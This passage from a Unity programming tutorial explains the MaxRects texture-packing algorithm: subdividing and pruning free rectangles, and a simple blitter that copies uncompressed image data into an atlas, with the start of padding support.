<span class="n">bestNode</span> <span class="o">=</span> <span class="k">new</span> <span class="n">Rect</span><span class="p">(</span><span class="n">freeRects</span><span class="p">[</span><span class="n">i</span><span class="p">].</span><span class="n">x</span><span class="p">,</span><span class="n">freeRects</span><span class="p">[</span><span class="n">i</span><span class="p">].</span><span class="n">y</span><span class="p">,</span> <span class="n">width</span><span class="p">,</span> <span class="n">height</span><span class="p">);</span>
<span class="n">bestShortSideFit</span> <span class="o">=</span> <span class="n">shortSideFit</span><span class="p">;</span>
<span class="n">bestLongSideFit</span> <span class="o">=</span> <span class="n">longSideFit</span><span class="p">;</span>
<span class="p">}</span></code></pre></figure>
<p>Remember that the bestShortSideFit and bestLongSideFit arguments are going to be read later by the PackTexture function to decide which texture to place next.</p>
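<p>To make the scoring rule concrete, here is a minimal, self-contained sketch of the same comparison. It is not the code from this post: <code>IntRect</code> and <code>FindBestFreeRect</code> are hypothetical names, and <code>IntRect</code> is only a stand-in for Unity’s <code>Rect</code> so that the snippet compiles outside of Unity.</p>

```csharp
using System;
using System.Collections.Generic;

// Hypothetical stand-in for UnityEngine.Rect so the sketch compiles outside Unity.
public struct IntRect
{
    public int x, y, width, height;
    public IntRect(int x, int y, int width, int height)
    {
        this.x = x; this.y = y; this.width = width; this.height = height;
    }
}

public static class BestFitSketch
{
    // Returns the index of the free rect with the best short side fit,
    // or -1 if the texture does not fit anywhere.
    public static int FindBestFreeRect(List<IntRect> freeRects, int width, int height)
    {
        int bestIndex = -1;
        int bestShortSideFit = int.MaxValue;
        int bestLongSideFit = int.MaxValue;

        for (int i = 0; i < freeRects.Count; ++i)
        {
            // Skip free rects that are too small to hold the texture.
            if (freeRects[i].width < width || freeRects[i].height < height) continue;

            int remainingX = freeRects[i].width - width;
            int remainingY = freeRects[i].height - height;
            int shortSideFit = Math.Min(remainingX, remainingY);
            int longSideFit = Math.Max(remainingX, remainingY);

            // Less leftover on the short side wins; the long side breaks ties.
            if (shortSideFit < bestShortSideFit ||
                (shortSideFit == bestShortSideFit && longSideFit < bestLongSideFit))
            {
                bestIndex = i;
                bestShortSideFit = shortSideFit;
                bestLongSideFit = longSideFit;
            }
        }
        return bestIndex;
    }
}
```

<p>For a 256x256 texture and free rects of 512x512, 300x1024 and 260x260, the short side leftovers are 256, 44 and 4 pixels respectively, so the 260x260 rect is the one that gets picked.</p>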
<p>That’s all there is to this function! All that’s left now is for us to be able to gracefully remove a rectangle from our free list.</p>
<h3 id="the-remove-function">The Remove Function</h3>
<p>Once we’ve found our target free rect, we add that placed texture rect to our output list, and remove that texture’s area from the free rectangle that it was placed in. In a lot of cases, this is going to give us a shape that isn’t a rectangle any more.</p>
<div align="center">
<img src="/images/post_images/2016-10-11/maxrectsplit.png" />
<font size="2">Image from <a href="http://pds25.egloos.com/pds/201504/21/98/RectangleBinPack.pdf">1000 Ways to Pack The Bin</a></font>
<br /><br />
</div>
<p>However, since we are only storing rectangles in our FreeRect list, we need to split this new shape into rectangles. The MaxRect algorithm name refers to the fact that we are going to split these kinds of shapes into up to four rectangles instead of two, meaning that some of the free rectangles will overlap each other.</p>
<p>What this overlap means in practice is that when we need to remove a rectangular area from our list of free rectangles, we have to check every rectangle in the free list and remove / subdivide all the ones that are affected, not just the one that we found to place our texture into. We also need to remove any rectangles in the free list which are wholly encompassed by another rectangle, which can happen as we add more and more textures to the atlas.</p>
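<p>Here is a small sketch of why a single placement can touch more than one free rectangle. The names (<code>IntRect</code>, <code>AffectedFreeRects</code>) are made up for illustration, and <code>IntRect</code> is just a stand-in for Unity’s <code>Rect</code> so the snippet runs outside of Unity.</p>

```csharp
using System.Collections.Generic;

// Hypothetical stand-in for UnityEngine.Rect so the sketch compiles outside Unity.
public struct IntRect
{
    public int x, y, width, height;
    public IntRect(int x, int y, int width, int height)
    {
        this.x = x; this.y = y; this.width = width; this.height = height;
    }

    // True when the two rects share any area (touching edges do not count).
    public bool Overlaps(IntRect other)
    {
        return x < other.x + other.width && x + width > other.x
            && y < other.y + other.height && y + height > other.y;
    }
}

public static class OverlapSketch
{
    // Returns the indices of every free rect that the placed rect eats into.
    public static List<int> AffectedFreeRects(IntRect placed, List<IntRect> freeRects)
    {
        var affected = new List<int>();
        for (int i = 0; i < freeRects.Count; ++i)
        {
            if (freeRects[i].Overlaps(placed)) affected.Add(i);
        }
        return affected;
    }
}
```

<p>Say a 40x30 texture sits in the corner of an empty 100x100 atlas. That leaves two free rects, (40, 0, 60, 100) and (0, 30, 100, 70), which share the region starting at (40, 30). If the next texture is a 50x50 placed at (0, 30), it was chosen to fit the second free rect, but it also overlaps the first one, so both of them have to be subdivided.</p>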
<p>We’re going to put all of this in the RemoveRectFromFreeList function that we saw earlier:</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="k">private</span> <span class="k">static</span> <span class="kt">void</span> <span class="nf">RemoveRectFromFreeList</span><span class="p">(</span><span class="n">Rect</span> <span class="n">rectToRemove</span><span class="p">,</span> <span class="n">List</span><span class="o"><</span><span class="n">Rect</span><span class="o">></span> <span class="n">freeRects</span><span class="p">);</span></code></pre></figure>
<p>The signature is pretty straightforward, and to be honest, so is the function, but let’s take a look at the outline of it first:</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="k">private</span> <span class="k">static</span> <span class="kt">void</span> <span class="nf">RemoveRectFromFreeList</span><span class="p">(</span> <span class="n">Rect</span> <span class="n">rectToRemove</span><span class="p">,</span>
<span class="n">List</span><span class="o"><</span><span class="n">Rect</span><span class="o">></span> <span class="n">freeRects</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">for</span> <span class="p">(</span><span class="kt">int</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o"><</span> <span class="n">freeRects</span><span class="p">.</span><span class="n">Count</span><span class="p">;</span> <span class="o">++</span><span class="n">i</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">Rect</span> <span class="n">freeRect</span> <span class="o">=</span> <span class="n">freeRects</span><span class="p">[</span><span class="n">i</span><span class="p">];</span>
<span class="k">if</span> <span class="p">(</span><span class="n">freeRect</span><span class="p">.</span><span class="n">Overlaps</span><span class="p">(</span><span class="n">rectToRemove</span><span class="p">))</span>
<span class="p">{</span>
<span class="c1">//subdivide rectangle here</span>
<span class="n">freeRects</span><span class="p">.</span><span class="n">RemoveAt</span><span class="p">(</span><span class="n">i</span><span class="o">--</span><span class="p">);</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="c1">//remove free rects that are wholly contained by others</span>
<span class="p">}</span></code></pre></figure>
<p>As discussed, there are really only two interesting parts to this function: the subdivision of affected rectangles, and the removal of ones that are wholly contained by larger ones.</p>
<p>Let’s look at the subdivision first. It’s tempting to think that we only need to split along the top and right sides, because we will always be subtracting the texture rect from the bottom left corner of the freeRect. If you’re always working with nicely power-of-two textures that may be the case, but things can get hairy when you mix in non-power-of-two (NPOT) textures, so we check all four sides of the input rectangle, like this:</p>
<div align="center">
<img src="/images/post_images/2016-10-11/subdivision.png" />
<br />
<br />
</div>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="c1">//subdivide rectangle here</span>
<span class="k">if</span> <span class="p">(</span><span class="n">rectToRemove</span><span class="p">.</span><span class="n">x</span> <span class="o"><</span> <span class="n">freeRect</span><span class="p">.</span><span class="n">x</span> <span class="o">+</span> <span class="n">freeRect</span><span class="p">.</span><span class="n">width</span> <span class="o">&&</span> <span class="n">rectToRemove</span><span class="p">.</span><span class="n">x</span> <span class="o">+</span> <span class="n">rectToRemove</span><span class="p">.</span><span class="n">width</span> <span class="o">></span> <span class="n">freeRect</span><span class="p">.</span><span class="n">x</span><span class="p">)</span> <span class="p">{</span>
<span class="c1">// New node at the top side of the used node.</span>
<span class="k">if</span> <span class="p">(</span><span class="n">rectToRemove</span><span class="p">.</span><span class="n">y</span> <span class="o">></span> <span class="n">freeRect</span><span class="p">.</span><span class="n">y</span> <span class="o">&&</span> <span class="n">rectToRemove</span><span class="p">.</span><span class="n">y</span> <span class="o"><</span> <span class="n">freeRect</span><span class="p">.</span><span class="n">y</span> <span class="o">+</span> <span class="n">freeRect</span><span class="p">.</span><span class="n">height</span><span class="p">)</span> <span class="p">{</span>
<span class="n">Rect</span> <span class="n">newNode</span> <span class="o">=</span> <span class="n">freeRect</span><span class="p">;</span>
<span class="n">newNode</span><span class="p">.</span><span class="n">height</span> <span class="o">=</span> <span class="n">rectToRemove</span><span class="p">.</span><span class="n">y</span> <span class="o">-</span> <span class="n">newNode</span><span class="p">.</span><span class="n">y</span><span class="p">;</span>
<span class="n">freeRects</span><span class="p">.</span><span class="n">Add</span><span class="p">(</span><span class="n">newNode</span><span class="p">);</span>
<span class="p">}</span>
<span class="c1">// New node at the bottom side of the used node.</span>
<span class="k">if</span> <span class="p">(</span><span class="n">rectToRemove</span><span class="p">.</span><span class="n">y</span> <span class="o">+</span> <span class="n">rectToRemove</span><span class="p">.</span><span class="n">height</span> <span class="o"><</span> <span class="n">freeRect</span><span class="p">.</span><span class="n">y</span> <span class="o">+</span> <span class="n">freeRect</span><span class="p">.</span><span class="n">height</span><span class="p">)</span> <span class="p">{</span>
<span class="n">Rect</span> <span class="n">newNode</span> <span class="o">=</span> <span class="n">freeRect</span><span class="p">;</span>
<span class="n">newNode</span><span class="p">.</span><span class="n">y</span> <span class="o">=</span> <span class="n">rectToRemove</span><span class="p">.</span><span class="n">y</span> <span class="o">+</span> <span class="n">rectToRemove</span><span class="p">.</span><span class="n">height</span><span class="p">;</span>
<span class="n">newNode</span><span class="p">.</span><span class="n">height</span> <span class="o">=</span> <span class="n">freeRect</span><span class="p">.</span><span class="n">y</span> <span class="o">+</span> <span class="n">freeRect</span><span class="p">.</span><span class="n">height</span> <span class="o">-</span> <span class="p">(</span><span class="n">rectToRemove</span><span class="p">.</span><span class="n">y</span> <span class="o">+</span> <span class="n">rectToRemove</span><span class="p">.</span><span class="n">height</span><span class="p">);</span>
<span class="n">freeRects</span><span class="p">.</span><span class="n">Add</span><span class="p">(</span><span class="n">newNode</span><span class="p">);</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="k">if</span> <span class="p">(</span><span class="n">rectToRemove</span><span class="p">.</span><span class="n">y</span> <span class="o"><</span> <span class="n">freeRect</span><span class="p">.</span><span class="n">y</span> <span class="o">+</span> <span class="n">freeRect</span><span class="p">.</span><span class="n">height</span> <span class="o">&&</span> <span class="n">rectToRemove</span><span class="p">.</span><span class="n">y</span> <span class="o">+</span> <span class="n">rectToRemove</span><span class="p">.</span><span class="n">height</span> <span class="o">></span> <span class="n">freeRect</span><span class="p">.</span><span class="n">y</span><span class="p">)</span> <span class="p">{</span>
<span class="c1">// New node at the left side of the used node.</span>
<span class="k">if</span> <span class="p">(</span><span class="n">rectToRemove</span><span class="p">.</span><span class="n">x</span> <span class="o">></span> <span class="n">freeRect</span><span class="p">.</span><span class="n">x</span> <span class="o">&&</span> <span class="n">rectToRemove</span><span class="p">.</span><span class="n">x</span> <span class="o"><</span> <span class="n">freeRect</span><span class="p">.</span><span class="n">x</span> <span class="o">+</span> <span class="n">freeRect</span><span class="p">.</span><span class="n">width</span><span class="p">)</span> <span class="p">{</span>
<span class="n">Rect</span> <span class="n">newNode</span> <span class="o">=</span> <span class="n">freeRect</span><span class="p">;</span>
<span class="n">newNode</span><span class="p">.</span><span class="n">width</span> <span class="o">=</span> <span class="n">rectToRemove</span><span class="p">.</span><span class="n">x</span> <span class="o">-</span> <span class="n">newNode</span><span class="p">.</span><span class="n">x</span><span class="p">;</span>
<span class="n">freeRects</span><span class="p">.</span><span class="n">Add</span><span class="p">(</span><span class="n">newNode</span><span class="p">);</span>
<span class="p">}</span>
<span class="c1">// New node at the right side of the used node.</span>
<span class="k">if</span> <span class="p">(</span><span class="n">rectToRemove</span><span class="p">.</span><span class="n">x</span> <span class="o">+</span> <span class="n">rectToRemove</span><span class="p">.</span><span class="n">width</span> <span class="o"><</span> <span class="n">freeRect</span><span class="p">.</span><span class="n">x</span> <span class="o">+</span> <span class="n">freeRect</span><span class="p">.</span><span class="n">width</span><span class="p">)</span> <span class="p">{</span>
<span class="n">Rect</span> <span class="n">newNode</span> <span class="o">=</span> <span class="n">freeRect</span><span class="p">;</span>
<span class="n">newNode</span><span class="p">.</span><span class="n">x</span> <span class="o">=</span> <span class="n">rectToRemove</span><span class="p">.</span><span class="n">x</span> <span class="o">+</span> <span class="n">rectToRemove</span><span class="p">.</span><span class="n">width</span><span class="p">;</span>
<span class="n">newNode</span><span class="p">.</span><span class="n">width</span> <span class="o">=</span> <span class="n">freeRect</span><span class="p">.</span><span class="n">x</span> <span class="o">+</span> <span class="n">freeRect</span><span class="p">.</span><span class="n">width</span> <span class="o">-</span> <span class="p">(</span><span class="n">rectToRemove</span><span class="p">.</span><span class="n">x</span> <span class="o">+</span> <span class="n">rectToRemove</span><span class="p">.</span><span class="n">width</span><span class="p">);</span>
<span class="n">freeRects</span><span class="p">.</span><span class="n">Add</span><span class="p">(</span><span class="n">newNode</span><span class="p">);</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="n">freeRects</span><span class="p">.</span><span class="n">RemoveAt</span><span class="p">(</span><span class="n">i</span><span class="o">--</span><span class="p">);</span></code></pre></figure>
<p>Note: this subdivision code has been shamelessly stolen from the public domain implementation of the <a href="http://wiki.unity3d.com/index.php?title=MaxRectsBinPack">MaxRect algorithm on the Unity Wiki</a>.
<br /></p>
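<p>If you’d like to poke at the subdivision with real numbers, the sketch below applies the same four checks to a single free rect and returns the pieces instead of adding them to a list. <code>IntRect</code> and <code>Split</code> are hypothetical names for this example only, and <code>IntRect</code> stands in for Unity’s <code>Rect</code> so it can run outside of Unity.</p>

```csharp
using System.Collections.Generic;

// Hypothetical stand-in for UnityEngine.Rect so the sketch compiles outside Unity.
public struct IntRect
{
    public int x, y, width, height;
    public IntRect(int x, int y, int width, int height)
    {
        this.x = x; this.y = y; this.width = width; this.height = height;
    }
}

public static class SubdivideSketch
{
    // Returns the free rects left over after cutting 'used' out of 'free'.
    // Assumes the caller has already checked that the two rects overlap.
    public static List<IntRect> Split(IntRect free, IntRect used)
    {
        var pieces = new List<IntRect>();

        if (used.x < free.x + free.width && used.x + used.width > free.x)
        {
            // Strip between the start of the free rect and the start of the used rect (in y).
            if (used.y > free.y && used.y < free.y + free.height)
                pieces.Add(new IntRect(free.x, free.y, free.width, used.y - free.y));

            // Strip between the end of the used rect and the end of the free rect (in y).
            if (used.y + used.height < free.y + free.height)
                pieces.Add(new IntRect(free.x, used.y + used.height, free.width,
                                       free.y + free.height - (used.y + used.height)));
        }

        if (used.y < free.y + free.height && used.y + used.height > free.y)
        {
            // Strip between the start of the free rect and the start of the used rect (in x).
            if (used.x > free.x && used.x < free.x + free.width)
                pieces.Add(new IntRect(free.x, free.y, used.x - free.x, free.height));

            // Strip between the end of the used rect and the end of the free rect (in x).
            if (used.x + used.width < free.x + free.width)
                pieces.Add(new IntRect(used.x + used.width, free.y,
                                       free.x + free.width - (used.x + used.width), free.height));
        }
        return pieces;
    }
}
```

<p>Cutting a 40x30 rect out of the corner of a 100x100 free rect gives two pieces, (0, 30, 100, 70) and (40, 0, 60, 100). Cutting a 20x20 rect out of the middle, at (40, 40), gives four, which is the case that the “top and right only” shortcut would miss.</p>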
<p>Finally, all that’s left is to prune our free list of redundant rectangles, meaning any that are wholly contained by another rectangle in the list:</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="c1">//remove free rects that are wholly contained by others</span>
<span class="k">for</span><span class="p">(</span><span class="kt">int</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o"><</span> <span class="n">freeRects</span><span class="p">.</span><span class="n">Count</span><span class="p">;</span> <span class="o">++</span><span class="n">i</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">for</span><span class="p">(</span><span class="kt">int</span> <span class="n">j</span> <span class="o">=</span> <span class="n">i</span><span class="o">+</span><span class="mi">1</span><span class="p">;</span> <span class="n">j</span> <span class="o"><</span> <span class="n">freeRects</span><span class="p">.</span><span class="n">Count</span><span class="p">;</span> <span class="o">++</span><span class="n">j</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="n">freeRects</span><span class="p">[</span><span class="n">i</span><span class="p">].</span><span class="n">IsContainedIn</span><span class="p">(</span><span class="n">freeRects</span><span class="p">[</span><span class="n">j</span><span class="p">]))</span>
<span class="p">{</span>
<span class="n">freeRects</span><span class="p">.</span><span class="n">RemoveAt</span><span class="p">(</span><span class="n">i</span><span class="p">);</span>
<span class="o">--</span><span class="n">i</span><span class="p">;</span>
<span class="k">break</span><span class="p">;</span>
<span class="p">}</span>
<span class="k">if</span> <span class="p">(</span><span class="n">freeRects</span><span class="p">[</span><span class="n">j</span><span class="p">].</span><span class="n">IsContainedIn</span><span class="p">(</span><span class="n">freeRects</span><span class="p">[</span><span class="n">i</span><span class="p">]))</span>
<span class="p">{</span>
<span class="n">freeRects</span><span class="p">.</span><span class="n">RemoveAt</span><span class="p">(</span><span class="n">j</span><span class="p">);</span>
<span class="o">--</span><span class="n">j</span><span class="p">;</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="p">}</span></code></pre></figure>
<p>The only interesting part of this code is the IsContainedIn function, which is just an extension method that I added to the Rect object to make this code more readable. That method is defined as follows:</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="k">public</span> <span class="k">static</span> <span class="kt">bool</span> <span class="nf">IsContainedIn</span><span class="p">(</span><span class="k">this</span> <span class="n">Rect</span> <span class="n">a</span><span class="p">,</span> <span class="n">Rect</span> <span class="n">b</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">return</span> <span class="n">a</span><span class="p">.</span><span class="n">x</span> <span class="o">>=</span> <span class="n">b</span><span class="p">.</span><span class="n">x</span> <span class="o">&&</span> <span class="n">a</span><span class="p">.</span><span class="n">y</span> <span class="o">>=</span> <span class="n">b</span><span class="p">.</span><span class="n">y</span>
<span class="o">&&</span> <span class="n">a</span><span class="p">.</span><span class="n">x</span><span class="o">+</span><span class="n">a</span><span class="p">.</span><span class="n">width</span> <span class="o"><=</span> <span class="n">b</span><span class="p">.</span><span class="n">x</span><span class="o">+</span><span class="n">b</span><span class="p">.</span><span class="n">width</span>
<span class="o">&&</span> <span class="n">a</span><span class="p">.</span><span class="n">y</span><span class="o">+</span><span class="n">a</span><span class="p">.</span><span class="n">height</span> <span class="o"><=</span> <span class="n">b</span><span class="p">.</span><span class="n">y</span><span class="o">+</span><span class="n">b</span><span class="p">.</span><span class="n">height</span><span class="p">;</span>
<span class="p">}</span></code></pre></figure>
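<p>As a quick sanity check of the pruning pass, here is a standalone sketch of the same double loop that you can run on a handful of rectangles. <code>IntRect</code>, <code>PruneSketch</code> and <code>Prune</code> are hypothetical names, with <code>IntRect</code> standing in for Unity’s <code>Rect</code>.</p>

```csharp
using System.Collections.Generic;

// Hypothetical stand-in for UnityEngine.Rect so the sketch compiles outside Unity.
public struct IntRect
{
    public int x, y, width, height;
    public IntRect(int x, int y, int width, int height)
    {
        this.x = x; this.y = y; this.width = width; this.height = height;
    }
}

public static class PruneSketch
{
    // True when every edge of 'a' lies inside (or exactly on) the edges of 'b'.
    public static bool IsContainedIn(this IntRect a, IntRect b)
    {
        return a.x >= b.x && a.y >= b.y
            && a.x + a.width <= b.x + b.width
            && a.y + a.height <= b.y + b.height;
    }

    // Removes every rect that is wholly contained by another rect in the list.
    public static void Prune(List<IntRect> freeRects)
    {
        for (int i = 0; i < freeRects.Count; ++i)
        {
            for (int j = i + 1; j < freeRects.Count; ++j)
            {
                if (freeRects[i].IsContainedIn(freeRects[j]))
                {
                    // Rect i is redundant: drop it and restart the inner loop
                    // with whatever rect slides into slot i.
                    freeRects.RemoveAt(i);
                    --i;
                    break;
                }
                if (freeRects[j].IsContainedIn(freeRects[i]))
                {
                    // Rect j is redundant: drop it and re-test the same slot.
                    freeRects.RemoveAt(j);
                    --j;
                }
            }
        }
    }
}
```

<p>Given the list (0, 0, 50, 20), (0, 0, 100, 40), (60, 0, 40, 100), the first rect sits entirely inside the second, so it gets removed and the other two survive.</p>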
<p>And with that, we’ve covered all the code needed to build a fully featured texture packer! Congratulations! The full source for the finished class is available here: [LINK TO PASTEBIN]</p>
<p>In my implementation, I wrap all of the code thus far in a TexturePacker class. I’m going to assume that you’ve done the same for the rest of this tutorial.</p>
<p>Despite all our hard work, our journey isn’t over. It’s time to put all this code to work and actually make an atlas.</p>
<h2 id="building-the-blitter">Building the Blitter</h2>
<p>As simple as it sounds, the Blitter is actually more nuanced than the packer, because it’s where you really start to dig into the features that you want your Texture Atlasser to have. At its most basic, all it needs to do is copy pixels from one texture to another, so let’s start by getting the simplest possible implementation set up:</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="k">public</span> <span class="k">static</span> <span class="n">Texture2D</span> <span class="nf">MakeAtlas</span><span class="p">(</span><span class="n">ref</span> <span class="n">Texture2D</span><span class="p">[]</span> <span class="n">textures</span><span class="p">,</span> <span class="n">out</span> <span class="n">Rect</span><span class="p">[]</span> <span class="n">packedRects</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">AtlasLayout</span> <span class="n">packResults</span> <span class="o">=</span> <span class="n">TextureAtlasser</span><span class="p">.</span><span class="n">PackTextures</span><span class="p">(</span><span class="n">textures</span><span class="p">,</span> <span class="mi">2048</span><span class="p">,</span><span class="mi">2048</span><span class="p">);</span>
<span class="n">Texture2D</span> <span class="n">outAtlas</span> <span class="o">=</span> <span class="k">new</span> <span class="n">Texture2D</span><span class="p">(</span><span class="n">packResults</span><span class="p">.</span><span class="n">width</span><span class="p">,</span> <span class="n">packResults</span><span class="p">.</span><span class="n">height</span><span class="p">);</span>
<span class="n">textures</span> <span class="o">=</span> <span class="n">packResults</span><span class="p">.</span><span class="n">textures</span><span class="p">;</span>
<span class="n">packedRects</span> <span class="o">=</span> <span class="n">packResults</span><span class="p">.</span><span class="n">rects</span><span class="p">;</span>
<span class="k">for</span> <span class="p">(</span><span class="kt">int</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o"><</span> <span class="n">packResults</span><span class="p">.</span><span class="n">textures</span><span class="p">.</span><span class="n">Count</span><span class="p">;</span> <span class="n">i</span><span class="o">++</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">Rect</span> <span class="n">rect</span> <span class="o">=</span> <span class="n">packResults</span><span class="p">.</span><span class="n">rects</span><span class="p">[</span><span class="n">i</span><span class="p">];</span>
<span class="n">Texture2D</span> <span class="n">readableTex</span> <span class="o">=</span> <span class="n">null</span><span class="p">;</span>
<span class="c1">//load the image uncompressed</span>
<span class="n">string</span> <span class="n">fileURL</span> <span class="o">=</span> <span class="n">AssetDatabase</span><span class="p">.</span><span class="n">GetAssetPath</span><span class="p">(</span><span class="n">packResults</span><span class="p">.</span><span class="n">textures</span><span class="p">[</span><span class="n">i</span><span class="p">]);</span>
<span class="n">byte</span><span class="p">[]</span> <span class="n">imgBytes</span> <span class="o">=</span> <span class="n">File</span><span class="p">.</span><span class="n">ReadAllBytes</span><span class="p">(</span><span class="n">fileURL</span><span class="p">);</span>
<span class="n">readableTex</span> <span class="o">=</span> <span class="k">new</span> <span class="n">Texture2D</span><span class="p">(</span><span class="mi">1</span><span class="p">,</span><span class="mi">1</span><span class="p">,</span><span class="n">TextureFormat</span><span class="p">.</span><span class="n">ARGB32</span><span class="p">,</span><span class="nb">false</span><span class="p">);</span>
<span class="n">readableTex</span><span class="p">.</span><span class="n">LoadImage</span><span class="p">(</span><span class="n">imgBytes</span><span class="p">);</span>
<span class="n">Color</span><span class="p">[]</span> <span class="n">pixels</span> <span class="o">=</span> <span class="n">readableTex</span><span class="p">.</span><span class="n">GetPixels</span><span class="p">();</span>
<span class="n">outAtlas</span><span class="p">.</span><span class="n">SetPixels</span><span class="p">((</span><span class="kt">int</span><span class="p">)</span><span class="n">rect</span><span class="p">.</span><span class="n">x</span><span class="p">,</span> <span class="p">(</span><span class="kt">int</span><span class="p">)</span><span class="n">rect</span><span class="p">.</span><span class="n">y</span><span class="p">,(</span><span class="kt">int</span><span class="p">)</span><span class="n">rect</span><span class="p">.</span><span class="n">width</span><span class="p">,(</span><span class="kt">int</span><span class="p">)</span><span class="n">rect</span><span class="p">.</span><span class="n">height</span><span class="p">,</span><span class="n">pixels</span><span class="p">);</span>
<span class="p">}</span>
<span class="c1">//set the wrap mode and upload the pixels once, after every texture has been copied</span>
<span class="n">outAtlas</span><span class="p">.</span><span class="n">wrapMode</span> <span class="o">=</span> <span class="n">TextureWrapMode</span><span class="p">.</span><span class="n">Clamp</span><span class="p">;</span>
<span class="n">outAtlas</span><span class="p">.</span><span class="n">Apply</span><span class="p">();</span>
<span class="k">return</span> <span class="n">outAtlas</span><span class="p">;</span>
<span class="p">}</span></code></pre></figure>
<p>Make sure you set your wrap mode to clamp; otherwise you’re going to get texture seams when using textures on the edges of the atlas, which might look like this:</p>
<div align="center">
<img src="/images/post_images/2016-10-11/textureseams.png" width="256" />
<br />
<br />
</div>
<p>You’ll know this is from your wrap mode instead of your mips because the seams won’t go away when you zoom in.</p>
<p>Also notice that in the above, I’m hardcoding the size of our atlas to be 2048x2048. This is just for brevity; in your own system, you’ll likely want to revisit this and do something smarter.</p>
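<p>As one possible starting point for picking the atlas size (an assumption on my part, not something the rest of this post relies on), you could estimate the smallest power-of-two square whose area could hold every texture. <code>EstimateAtlasSide</code> is a hypothetical helper, and it assumes <code>maxSide</code> is itself a power of two.</p>

```csharp
using System;

public static class AtlasSizeSketch
{
    // Returns the smallest power-of-two side length whose square has enough
    // area for all the textures and is at least as large as the biggest
    // texture dimension, capped at maxSide (assumed to be a power of two).
    // This is only a lower bound: the packer can still fail at this size.
    public static int EstimateAtlasSide(int[] widths, int[] heights, int maxSide)
    {
        long totalArea = 0;
        int largestDimension = 1;
        for (int i = 0; i < widths.Length; ++i)
        {
            totalArea += (long)widths[i] * heights[i];
            largestDimension = Math.Max(largestDimension, Math.Max(widths[i], heights[i]));
        }

        int side = 1;
        while (side < maxSide && (side < largestDimension || (long)side * side < totalArea))
        {
            side *= 2;
        }
        return side;
    }
}
```

<p>Because the estimate only looks at area, a sensible way to use it would be to try packing at that size and double it whenever the packer can’t place everything.</p>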
<p>There’s a really really big mistake that you can make in your blitter, and that’s using textures that have already been compressed by Unity. Unless you’re importing all your textures as uncompressed, Unity has likely already applied some amount of compression to the textures in your project. If we use the Unity imported textures in our atlas, when the atlas is compressed, we’re going to compress the images inside it twice, which is going to make them look far worse than they have to.</p>
<p>To get around that, you can load the image directly from disk as a byte array and use that instead (like I’m doing above). It’s a few extra lines of code that makes a big difference on your final product. Note that this will only work if your images are jpgs or pngs. If they’re tifs, or psds or something else weird, you’ll have to find a different solution.</p>
<p>What we have here is where most texture atlassing systems seem to stop, and this is a perfectly sensible place to stop if you aren’t going to be mipping your atlasses, but there are two things we can do to make this more friendly, which I’ll talk about next.</p>
<h3 id="padding-support">Padding Support</h3>
<p>One thing we can do is to add support for padding to our blit function. Padding simply means adding space between the different textures that we pack in our atlas:</p>
<div align="center">
<img src="/images/post_images/2016-10-11/paddedatlas.png" />
<br />
<br />
</div>
<p>One key thing to note with padding in an atlas is that we want the padding to be inner padding. For example, if we have a 512x512 texture in the atlas, and we want to add 5 pixels of padding on each side, we are going to add the padding to the perimeter of that texture’s rectangle and render the texture into a 502x502 rectangle in the center. You can do it the other way around, but it’s easier for artists to reason about how much texture space they’re using if we can still say things like “you can fit 4 512x512 textures into a 1024x1024 atlas.”</p>
<p>This means that we’re going to have to resize our input textures on the fly. Luckily, Unity already has a super handy function for this, Texture2D.GetPixelBilinear, which takes a UV coordinate and returns the bilinearly sampled texel color. Nifty, right?</p>
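<p>The arithmetic behind inner padding is small enough to sketch on its own. The helper names below (<code>InnerRect</code>, <code>ToUV</code>) are hypothetical and exist only for this example; the actual sampling would still be done by Unity’s <code>GetPixelBilinear</code>.</p>

```csharp
public static class PaddingSketch
{
    // Shrinks a packed rect by 'padding' pixels on every side (inner padding).
    // Returns { x, y, width, height } of the area the texture is drawn into.
    public static int[] InnerRect(int x, int y, int width, int height, int padding)
    {
        return new int[]
        {
            x + padding,
            y + padding,
            width - padding * 2,
            height - padding * 2
        };
    }

    // Maps a pixel index inside the inner rect to the normalized coordinate
    // that would be handed to a bilinear sampler.
    public static float ToUV(int pixel, int innerSize)
    {
        return pixel / (float)innerSize;
    }
}
```

<p>For a 512x512 rect packed at (512, 0) with 5 pixels of padding, the texture ends up in a 502x502 area starting at (517, 5), and the pixel at index 251 along either axis samples the source texture at a coordinate of 0.5.</p>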
<p>So what we’re going to do is modify our function signature to take an integer argument for padding:</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="k">public</span> <span class="k">static</span> <span class="n">Texture2D</span> <span class="n">MakeAtlas</span><span class="p">(</span><span class="n">ref</span> <span class="n">Texture2D</span><span class="p">[]</span> <span class="n">textures</span><span class="p">,</span> <span class="n">out</span> <span class="n">Rect</span><span class="p">[]</span> <span class="n">packedRects</span><span class="p">,</span> <span class="kt">int</span> <span class="n">padding</span><span class="p">)</span></code></pre></figure>
<p>and then modify the code that’s inside the for loop we saw above:</p>
